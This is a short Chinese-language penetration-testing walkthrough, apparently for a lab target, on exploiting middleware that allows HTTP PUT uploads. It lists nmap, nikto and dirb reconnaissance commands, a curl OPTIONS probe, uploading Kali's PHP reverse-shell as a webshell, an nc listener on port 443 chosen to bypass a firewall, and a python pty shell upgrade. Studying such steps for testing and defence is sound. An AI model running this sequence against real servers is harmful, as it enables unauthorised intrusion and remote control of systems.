文件上传之中间件PUT上传
中间件PUT上传
漏洞说明
中间件包括apache,tomcat,iis,weblogic等,这些中间件可以设置支持http方法。(HTTP方法包括GET,POST,HEAD,DELETE,PUT,OPTINOS等)每一个HTTP方法有对应的功能,在这些方法中,put可以直接从客户机上传文件到服务器上如果中间件开放了http的PUT方法,那么恶意攻击者就可以直接上传webshell到服务器对应目录直接上传webshell,也从侧面反映了PUT漏洞的严重危害性。
渗透攻击
1.信息收集
扫描主机开放全部端口namp -p- -T4 IP
扫描主机全部信息nmap -T4 -A -v IP
探测敏感页面
nikto -host http://IP:port
目录探测dirb http://ip:port
2.分析
对nikto结果,nmap结果分析
3.漏洞扫描
对于开放的web还有系统进行扫描,owasp-zap,nessus
发现扫描器没有发现什么漏洞。
所以需要手工测试PUT漏洞
对铭感目录进行测试
curl -v -X OPTIONS http://靶机/text
说明该目录是存在PUT漏洞的
利用PUT漏洞获取shell思路
上传webshell到服务器后,之后通过对应目录遍历路径访问webshell,执行webshell,在kali收获反弹shell
4.攻击阶段
上传webshell
在test目录下直接使用火狐插件poster,上传webshell;
使用cp /usr/share/webshells/php/php-reverse-shell.php shell.php
kali需要开启对应的监听
nc -nlvp 443 为了绕过机器的防火墙 端口号要用443
5.提权
1.返回来的是一个标准的输出,可能执行不了一些命令比如su,所以需要美化终端
python -c “import pty;pty.spawn(’/bin/bash’)”